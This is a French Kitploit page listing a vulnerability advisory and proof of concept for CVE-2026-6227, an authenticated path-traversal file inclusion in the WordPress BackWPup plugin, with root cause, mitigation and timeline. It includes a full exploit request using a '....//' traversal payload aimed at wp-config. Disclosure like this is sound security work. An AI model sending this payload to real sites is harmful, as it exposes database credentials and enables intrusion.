Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-6227 — Preuve de concept à visée éducative pour CVE-2026-6227, une inclusion locale de fichier authentifiée dans le plugin WordPress BackWPup, incluant l'analyse de la cause racine, la requête d'exploitation et les recommandations d'atténuation. | Kitploit
Outils/GitHubGitHub/pixel-defaultbr/cve-2026-6227
Analyse des VulnérabilitésExploitationExploitation d'Applications WebArticles et RechercheApprentissage et Éducation
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

Preuve de concept à visée éducative pour CVE-2026-6227, une inclusion locale de fichier authentifiée dans le plugin WordPress BackWPup, incluant l'analyse de la cause racine, la requête d'exploitation et les recommandations d'atténuation.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-6227 : Inclusion locale de fichier dans BackWPup

CVSS Version Researcher

Résumé de l'avis

Les versions de BackWPup jusqu'à la 5.6.6 incluse sont affectées par une vulnérabilité d'inclusion locale de fichier (LFI) authentifiée via le paramètre block_name du point de terminaison REST /wp-json/backwpup/v1/getblock.

Le défaut a été causé par une désinfection non récursive via str_replace() des séquences de traversée et est déjà corrigé dans la version 5.6.7.

Métadonnées

  • CVE : CVE-2026-6227
  • Sévérité : Élevée
  • Score CVSS : 7.2
  • Produit affecté : Plugin WordPress BackWPup
  • Versions affectées : <= 5.6.6
  • Version corrigée : 5.6.7
  • Statut : Corrigé
  • Date de divulgation : 2026-04-13
  • Chercheur : Pixel_DefaultBR
  • Avertissement

    Ce dépôt est strictement destiné à des fins éducatives et de recherche en sécurité éthique. Les informations fournies ici visent à aider les administrateurs et les équipes de sécurité à vérifier leurs systèmes. N'utilisez pas cela contre des cibles sans autorisation écrite explicite.

    Surface affectée

    • Fonction : BackWPupHelpers::component()
    • Point de terminaison : POST /wp-json/backwpup/v1/getblock
    • Paramètre : block_name
    • Niveau d'accès : Administrateur authentifié (ou utilisateurs disposant de permissions de sauvegarde déléguées)

    Analyse de la cause racine

    Le chargeur de composants vulnérable applique une désinfection non récursive via str_replace() avant d'invoquer include(). Cela peut être contourné en utilisant des motifs de traversée élaborés tels que ....// ou ..././, permettant une résolution de chemin contrôlée par l'attaquant.

    Impact

    • Inclusion arbitraire de fichiers PHP locaux depuis le système de fichiers du serveur
    • Exposition potentielle de données sensibles (par exemple, wp-config.php)
    • Exécution de code à distance possible dans certaines configurations serveur/application

    Par défaut, l'exploitation nécessite un accès de niveau administrateur. Si les permissions de sauvegarde sont déléguées, les utilisateurs à privilèges réduits peuvent également être en mesure d'exploiter ce problème.

    Conditions préalables à l'exploitation

    • Session WordPress authentifiée valide
    • Nonce REST valide
    • Privilèges d'administrateur ou permissions de sauvegarde déléguées

    Preuve de concept

    Scénario : Inclusion locale de fichier

    1. Connectez-vous à WordPress avec un compte disposant de la capacité de tâche BackWPup.
    2. Déclenchez une requête normale depuis l'interface du plugin et interceptez le trafic avec un proxy.
    3. Localisez une requête POST légitime vers /wp-json/backwpup/v1/getblock.
    4. Remplacez block_name par une charge utile de traversée.

    Exemple de requête :

    root@kitploit:~
    POST /wp-json/backwpup/v1/getblock HTTP/1.1
    Host: target.example.com
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-WP-Nonce: <your_nonce_here>
    Cookie: wordpress_logged_in_<hash>=<your_session_cookie>
    
    block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
    
    1. Observez la réponse pour vérifier le comportement d'inclusion de fichier.

    Chronologie

    • 2026-03 : Vulnérabilité signalée à l'éditeur
    • 2026-03-25 : Correctif de l'éditeur publié dans la version 5.6.7
    • 2026-04-13 : Divulgation publique (CVE-2026-6227)

    Atténuation

    • Mettez à jour BackWPup vers la version 5.6.7 ou ultérieure
    • Restreignez l'attribution de la capacité backwpup uniquement aux rôles de confiance
    • Examinez les journaux d'audit pour détecter tout accès suspect à /wp-json/backwpup/v1/getblock

    Références

    • Page du plugin de l'éditeur : https://wordpress.org/plugins/backwpup/
    • Référence CVE (Wordfence) : https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
    Télécharger l’outil